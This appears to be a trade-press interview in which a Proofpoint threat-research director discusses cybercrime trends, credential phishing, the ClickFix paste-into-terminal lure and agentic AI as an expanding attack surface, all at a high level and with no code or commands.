Taking threat intelligence seriously an imperative for organizations

Daniel Blackford, Senior Director of Threat Research at Proofpoint, believes threat detection is going to get harder as more AI agents are deployed.

For Daniel Blackford, Senior Director of Threat Research at Proofpoint, threats in the region are becoming increasingly rampant and sophisticated as the entire process has matured and built over the last 15 to 20 years.

He believes that there has been so much money that has gone into the cybercrime ecosystem from all the breaches that new participants are incentivized to join, be recruited, and start their life of cybercrime.

“We're really seeing globally distributed threats at this point. Customers in every region recognize that they're going to have to improve their security capabilities. Most of the customers that I've talked to, they at least given the indication that they understand what it is,” said Blackford.

For Blackford, while cybersecurity vendors have intelligence provided by their customers, customers themselves need to be looking for all of the sources that they can protect, and just not their perimeter.

“We (Proofpoint) have to protect the world's perimeter. We have real data, like proprietary data, that helps. There are a lot of cases where even big intelligence vendors go in and do incident response, and they get their data through that, through that process, but they don't necessarily have active sensors that things are going through to kind of feed them. So, the fact that we do have that is great,” he explained.

Blackford added that Proofpoint partners with a lot of international law enforcement, governmental agencies, intelligence agencies, and are able to, in curated fashion, tip each other off.

Taking threat intelligence seriously

As businesses are beginning to understand the importance of relying on threat intelligence, Blackford feels that areas like generic credential harvesting, phishing, are not being taken seriously enough.

“There's an order of magnitude higher than we see, like malware payloads being directly distributed, for example. And I think more than ever, threat actors are realizing that account takeover can lead them to a lot of the same kind of endpoints that actually getting malicious software on a system will do. It's like you get access to an account, get access to an inbox; they're going to have access to some data, to some systems and such. They can now send email internally coming from a trusted source; they can add apps. They can even give permission to second and third-party apps,” he explained.

“I don't think that's being taken seriously enough,” he added.

The other technique that is being used in delivery of multiple different kinds of threats is a malware called ClickFix, whereby a user is presented with some content. It might be a document, HTML document, or it might be an actual website, and they often have to go through a CAPTCHA if they completed successfully, the threat actor will say they didn't and couldn't verify that they're a human, so they need the user to log in, as they can't authenticate the user in order to access it. They will need more information from the user.

“What they ask you to do is copy and paste it into a terminal. It seems like you're familiar with the with the technique, but the fact that so many different actors are using it like ones that are would previously be associated with fake updates, because DPRK, China, Russia, have all used it right there. It's being embraced so broadly, and to me is like a counter intuitive. I don't know why people would paste it but it's successful. And there’s been a 400% year over year, increase in that, he added.

AI and threats

Blackford also believes the mass adoption of agentic AI represents the largest increase in attack surface since maybe mass migration to the cloud.

“Cybercrime is never going to be defeated. There are always going to be criminals. There's always going to be vulnerable technologies and new versions of things coming out. Will we be able to predict things? I think that even with more data, even with more vendors, even with more intelligence than ever, I think we're at a period with the oncoming agentic future that we're less able to predict what is going to happen than ever before. So, it's going to be harder,” said Blackford.

Blackford believes that organizations need to iterate through this process. AI agents are becoming much more advanced now than they were six months ago. In six months’ time, he foresees more businesses are going to have developed agents around their own specific use cases, and they're going to be probably an order of magnitude more publicly facing MCP servers that are out there.

“As these things happen in stages, threat actors will pivot to take advantage of them where they are in that stage, and then there'll be a response, and then there'll be a response to the response. Things will develop quickly, but iteratively, and maybe once we're a little kind of deeper into those waters will be at a point where we can predict how the future is going to go. But right now, it looks wide open to me,” he concluded.